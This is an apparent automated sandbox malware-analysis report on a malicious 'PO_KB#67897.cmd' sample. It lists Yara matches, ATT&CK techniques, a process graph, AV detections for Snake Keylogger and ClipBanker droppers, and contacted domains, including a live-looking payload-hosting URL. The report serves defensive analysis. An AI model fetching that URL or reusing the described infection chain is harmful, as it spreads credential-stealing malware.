                        Source: Yara matchFile source: 8.2.rpkhzpuO.pif.25173f56.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.2.rpkhzpuO.pif.2f7c0000.9.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.rpkhzpuO.pif.35f30f08.10.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.rpkhzpuO.pif.35f30f08.10.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.rpkhzpuO.pif.2fdd3d90.9.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.2.rpkhzpuO.pif.2e323d90.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rpkhzpuO.pif.26523d90.12.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.2.rpkhzpuO.pif.2e2e6478.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rpkhzpuO.pif.25174e5e.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rpkhzpuO.pif.264e6478.10.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.rpkhzpuO.pif.2ecd0f08.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.3.rpkhzpuO.pif.2350ac48.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.2.rpkhzpuO.pif.2e323d90.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.rpkhzpuO.pif.34ad3d90.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.rpkhzpuO.pif.35f30000.9.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rpkhzpuO.pif.280c0000.17.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.3.rpkhzpuO.pif.2d0ead88.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.rpkhzpuO.pif.34a95570.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.rpkhzpuO.pif.2eaa3f56.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rpkhzpuO.pif.25174e5e.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.rpkhzpuO.pif.312b0000.11.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rpkhzpuO.pif.26523d90.12.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.rpkhzpuO.pif.2ecd0000.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.2.rpkhzpuO.pif.2d0c3f56.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.2.rpkhzpuO.pif.2e2e5570.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.3.rpkhzpuO.pif.31ae57d0.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.rpkhzpuO.pif.33783f56.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.rpkhzpuO.pif.33784e5e.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.rpkhzpuO.pif.2ecd0000.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rpkhzpuO.pif.280c0000.17.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rpkhzpuO.pif.27a90f08.15.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.2.rpkhzpuO.pif.2f7c0f08.10.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.rpkhzpuO.pif.33783f56.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.rpkhzpuO.pif.312b0000.11.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.rpkhzpuO.pif.2fdd3d90.9.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.rpkhzpuO.pif.2eaa3f56.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.rpkhzpuO.pif.33784e5e.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.2.rpkhzpuO.pif.2f7c0f08.10.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.2.rpkhzpuO.pif.2e2e5570.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.2.rpkhzpuO.pif.2e2e6478.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.rpkhzpuO.pif.34a96478.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.rpkhzpuO.pif.35f30000.9.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rpkhzpuO.pif.27a90000.16.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.3.rpkhzpuO.pif.2d0ead88.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.rpkhzpuO.pif.34a95570.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.2.rpkhzpuO.pif.2ff20000.11.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rpkhzpuO.pif.27a90000.16.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.rpkhzpuO.pif.2fd95570.10.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.rpkhzpuO.pif.2eaa4e5e.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.3.rpkhzpuO.pif.2b351240.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 26.2.rpkhzpuO.pif.2d0c4e5e.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rpkhzpuO.pif.264e6478.10.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.rpkhzpuO.pif.2fd96478.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.rpkhzpuO.pif.2eaa4e5e.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.rpkhzpuO.pif.2ecd0f08.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rpkhzpuO.pif.25173f56.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 21.2.rpkhzpuO.pif.34a96478.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rpkhzpuO.pif.264e5570.9.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 31.2.rpkhzpuO.pif.2fd96478.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000001F.00000002.2695514518.000000002EA63000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001F.00000002.2698667477.000000002ECD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001A.00000002.2653675351.000000002FF20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000003.2176410380.000000002350A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000002.2565470254.0000000033743000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001F.00000003.2505077127.000000002D0EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001A.00000002.2644300802.000000002E2E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001F.00000002.2704916181.00000000312B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001A.00000002.2646464054.000000002F7C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000002.2626188397.0000000034A95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001A.00000002.2639575698.000000002D083000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2276789747.0000000027A90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000002.2627942016.0000000035F30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2277062923.00000000280C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000002.2629075725.0000000036680000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2262951312.0000000025133000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001F.00000002.2700260465.000000002FD95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2272905069.00000000264E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000015.00000003.2314988058.0000000031AE5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000001A.00000003.2417739511.000000002B351000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 8.2.rpkhzpuO.pif.265ad410.11.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rpkhzpuO.pif.265951f0.13.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rpkhzpuO.pif.2657cfc0.14.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rpkhzpuO.pif.265ad410.11.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rpkhzpuO.pif.265951f0.13.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.0.Microsofts.exe.6e0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.rpkhzpuO.pif.2657cfc0.14.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000A.00000000.2197832662.00000000006E2000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000002.2272905069.0000000026564000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: rpkhzpuO.pif PID: 3080, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: Microsofts.exe PID: 3248, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Microsofts.exe, type: DROPPED
                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire Infrastructure1
                        Valid Accounts
                        12
                        Native API
                        1
                        DLL Side-Loading
                        1
                        DLL Side-Loading
                        11
                        Disable or Modify Tools
                        1
                        OS Credential Dumping
                        1
                        System Time Discovery
                        Remote Services11
                        Archive Collected Data
                        1
                        Ingress Tool Transfer
                        Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts1
                        Shared Modules
                        1
                        Valid Accounts
                        1
                        Valid Accounts
                        11
                        Deobfuscate/Decode Files or Information
                        1
                        Input Capture
                        1
                        System Network Connections Discovery
                        Remote Desktop Protocol1
                        Data from Local System
                        11
                        Encrypted Channel
                        Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts2
                        Command and Scripting Interpreter
                        1
                        Scheduled Task/Job
                        1
                        Access Token Manipulation
                        3
                        Obfuscated Files or Information
                        Security Account Manager2
                        File and Directory Discovery
                        SMB/Windows Admin Shares1
                        Screen Capture
                        2
                        Non-Application Layer Protocol
                        Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal Accounts1
                        Scheduled Task/Job
                        21
                        Registry Run Keys / Startup Folder
                        311
                        Process Injection
                        3
                        Software Packing
                        NTDS36
                        System Information Discovery
                        Distributed Component Object Model1
                        Email Collection
                        113
                        Application Layer Protocol
                        Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
                        Scheduled Task/Job
                        1
                        Timestomp
                        LSA Secrets241
                        Security Software Discovery
                        SSH1
                        Input Capture
                        Fallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts21
                        Registry Run Keys / Startup Folder
                        1
                        DLL Side-Loading
                        Cached Domain Credentials41
                        Virtualization/Sandbox Evasion
                        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                        Masquerading
                        DCSync2
                        Process Discovery
                        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                        Valid Accounts
                        Proc Filesystem1
                        Application Window Discovery
                        Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                        Access Token Manipulation
                        /etc/passwd and /etc/shadow1
                        System Network Configuration Discovery
                        Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron41
                        Virtualization/Sandbox Evasion
                        Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                        Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd311
                        Process Injection
                        Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1582352 Sample: PO_KB#67897.cmd Startdate: 30/12/2024 Architecture: WINDOWS Score: 100 91 reallyfreegeoip.org 2->91 93 lwaziacademy.com 2->93 95 2 other IPs or domains 2->95 103 Found malware configuration 2->103 105 Malicious sample detected (through community Yara rule) 2->105 107 Multi AV Scanner detection for submitted file 2->107 111 17 other signatures 2->111 11 cmd.exe 1 2->11         started        13 Oupzhkpr.PIF 2->13         started        16 Oupzhkpr.PIF 2->16         started        18 Oupzhkpr.PIF 2->18         started        signatures3 109 Tries to detect the country of the analysis system (by using the IP) 91->109 process4 signatures5 20 x.exe 1 10 11->20         started        25 extrac32.exe 8 11->25         started        27 conhost.exe 11->27         started        137 Multi AV Scanner detection for dropped file 13->137 139 Writes to foreign memory regions 13->139 141 Allocates memory in foreign processes 13->141 29 cmd.exe 13->29         started        31 rpkhzpuO.pif 13->31         started        143 Sample uses process hollowing technique 16->143 145 Sample is not signed and drops a device driver 16->145 33 cmd.exe 16->33         started        35 rpkhzpuO.pif 16->35         started        37 cmd.exe 18->37         started        39 rpkhzpuO.pif 18->39         started        process6 dnsIp7 97 lwaziacademy.com 41.185.8.252, 443, 49711, 49712 GridhostZA South Africa 20->97 75 C:\Users\Public\Libraries\rpkhzpuO.pif, PE32 20->75 dropped 77 C:\Users\Public\Libraries\Oupzhkpr.PIF, PE32 20->77 dropped 79 C:\Users\Public\Oupzhkpr.url, MS 20->79 dropped 83 2 other malicious files 20->83 dropped 113 Multi AV Scanner detection for dropped file 20->113 115 Drops PE files with a suspicious file extension 20->115 117 Writes to foreign memory regions 20->117 119 4 other signatures 20->119 41 rpkhzpuO.pif 6 20->41         started        45 cmd.exe 1 20->45         started        81 C:\Users\user\AppData\Local\Temp\x.exe, PE32 25->81 dropped 47 conhost.exe 29->47         started        49 conhost.exe 33->49         started        51 conhost.exe 37->51         started        file8 signatures9 process10 file11 87 C:\Users\user\AppData\...\Trading_AIBot.exe, PE32 41->87 dropped 89 C:\Users\user\AppData\...\Microsofts.exe, PE32 41->89 dropped 133 Detected unpacking (changes PE section rights) 41->133 135 Detected unpacking (overwrites its own PE header) 41->135 53 Trading_AIBot.exe 5 41->53         started        57 Microsofts.exe 15 2 41->57         started        60 conhost.exe 45->60         started        signatures12 process13 dnsIp14 85 C:\Users\user\AppData\Roaming\...\apihost.exe, PE32 53->85 dropped 121 Antivirus detection for dropped file 53->121 123 Multi AV Scanner detection for dropped file 53->123 125 Machine Learning detection for dropped file 53->125 131 3 other signatures 53->131 62 powershell.exe 23 53->62         started        65 apihost.exe 53->65         started        67 schtasks.exe 53->67         started        99 checkip.dyndns.com 193.122.130.0, 49720, 80 ORACLE-BMC-31898US United States 57->99 101 reallyfreegeoip.org 188.114.97.3, 443, 49726 CLOUDFLARENETUS European Union 57->101 127 Tries to steal Mail credentials (via file / registry access) 57->127 129 Tries to harvest and steal browser information (history, passwords, etc) 57->129 file15 signatures16 process17 signatures18 147 Loading BitLocker PowerShell Module 62->147 69 conhost.exe 62->69         started        71 WmiPrvSE.exe 62->71         started        149 Antivirus detection for dropped file 65->149 73 conhost.exe 67->73         started        process19

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand
                        SourceDetectionScannerLabelLink
                        PO_KB#67897.cmd25%VirustotalBrowse
                        PO_KB#67897.cmd29%ReversingLabsWin32.Trojan.Malcab
                        SourceDetectionScannerLabelLink
                        C:\Users\user\AppData\Local\Temp\Microsofts.exe100%AviraTR/ATRAPS.Gen
                        C:\Users\user\AppData\Roaming\ACCApi\apihost.exe100%AviraTR/Dropper.Gen
                        C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe100%AviraTR/Dropper.Gen
                        C:\Users\user\AppData\Local\Temp\Microsofts.exe100%Joe Sandbox ML
                        C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe100%Joe Sandbox ML
                        C:\Users\Public\Libraries\Oupzhkpr.PIF18%ReversingLabsWin32.Trojan.Generic
                        C:\Users\Public\Libraries\rpkhzpuO.pif3%ReversingLabs
                        C:\Users\user\AppData\Local\Temp\Microsofts.exe96%ReversingLabsByteCode-MSIL.Spyware.Snakekeylogger
                        C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe79%ReversingLabsByteCode-MSIL.Infostealer.ClipBanker
                        C:\Users\user\AppData\Local\Temp\x.exe18%ReversingLabsWin32.Trojan.Generic
                        No Antivirus matches
                        No Antivirus matches
                        SourceDetectionScannerLabelLink
                        https://lwaziacademy.com/wps/200_Oupzhkprnvw0%Avira URL Cloudsafe
                        https://lwaziacademy.com/wps/200_Oupzhkprnvwuk0%Avira URL Cloudsafe
                        https://lwaziacademy.com:443/wps/200_Oupzhkprnvw0%Avira URL Cloudsafe
                        https://lwaziacademy.com/H0%Avira URL Cloudsafe
                        http://crl.microb0%Avira URL Cloudsafe
                        https://lwaziacademy.com/wps/2000%Avira URL Cloudsafe
                        NameIPActiveMaliciousAntivirus DetectionReputation
                        reallyfreegeoip.org
                        188.114.97.3
                        truefalse
                          high
                          lwaziacademy.com
                          41.185.8.252
                          truetrue
                            unknown
                            checkip.dyndns.com
                            193.122.130.0
                            truefalse
                              high
                              checkip.dyndns.org
                              unknown
                              unknownfalse
                                high
                                NameMaliciousAntivirus DetectionReputation
                                https://reallyfreegeoip.org/xml/8.46.123.189false
                                  high
                                  https://lwaziacademy.com/wps/200_Oupzhkprnvwtrue
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://checkip.dyndns.org/false
                                    high
                                    NameSourceMaliciousAntivirus DetectionReputation
                                    http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0x.exe, 00000004.00000003.2168227414.000000007ECC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F2C9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220287615.0000000021936000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217A1000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.0000000020856000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000001.2174375803.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000003.2303716547.0000000000694000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.0000000000962000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.00000000009BF000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      http://nuget.org/NuGet.exepowershell.exe, 0000000B.00000002.2394103071.0000000005395000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://sectigo.com/CPS0x.exe, 00000004.00000003.2168227414.000000007ECC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F2C9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220287615.0000000021936000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217A1000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.0000000020856000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000001.2174375803.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000003.2303716547.0000000000694000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.0000000000962000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.00000000009BF000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0x.exe, 00000004.00000003.2168227414.000000007ECC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F2C9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220287615.0000000021936000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217A1000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.0000000020856000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000001.2174375803.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000003.2303716547.0000000000694000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.0000000000962000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.00000000009BF000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            http://ocsp.sectigo.com0x.exe, 00000004.00000003.2168227414.000000007ECC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F2C9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220287615.0000000021936000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217A1000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.0000000020856000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000001.2174375803.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000003.2303716547.0000000000694000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.0000000000962000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.00000000009BF000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000B.00000002.2304962068.0000000004485000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000000B.00000002.2304962068.0000000004485000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000B.00000002.2304962068.0000000004485000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://lwaziacademy.com:443/wps/200_Oupzhkprnvwx.exe, 00000004.00000002.2175552195.00000000006CA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://reallyfreegeoip.orgdMicrosofts.exe, 0000000A.00000002.3379727606.0000000002A6B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#x.exe, 00000004.00000003.2168227414.000000007ECC0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2256309659.000000007F2C9000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED23000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000002.2220287615.0000000021936000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168009889.000000007ED79000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217A1000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000004.00000002.2212967585.0000000020856000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.2168885763.00000000217FE000.00000004.00000020.00020000.00000000.sdmp, rpkhzpuO.pif, 00000008.00000001.2174375803.0000000000B49000.00000040.00000001.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000003.2303716547.0000000000694000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 00000011.00000002.2391313393.0000000020862000.00000004.00001000.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.0000000000962000.00000004.00000020.00020000.00000000.sdmp, Oupzhkpr.PIF, 0000001C.00000003.2495396982.00000000009BF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        high
                                                        https://contoso.com/Licensepowershell.exe, 0000000B.00000002.2394103071.0000000005395000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://contoso.com/Iconpowershell.exe, 0000000B.00000002.2394103071.0000000005395000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://reallyfreegeoip.org/xml/8.46.1dMicrosofts.exe, 0000000A.00000002.3379727606.0000000002A4E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://checkip.dyndns.orgMicrosofts.exe, 0000000A.00000002.3379727606.0000000002A4E000.00000004.00000800.00020000.00000000.sdmp, Microsofts.exe, 0000000A.00000002.3379727606.00000000029D1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
